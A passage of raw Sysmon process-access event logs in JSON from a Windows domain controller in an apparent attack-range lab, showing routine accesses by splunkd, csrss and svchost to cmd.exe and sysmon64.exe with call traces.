Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00108A6E0100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3621,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01B6-5F25-0000-00108A6E0100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01B6-5F25-0000-00108A6E0100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3622,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3623,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3624,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3625,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3626,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3627,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.514","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3628,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.514\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 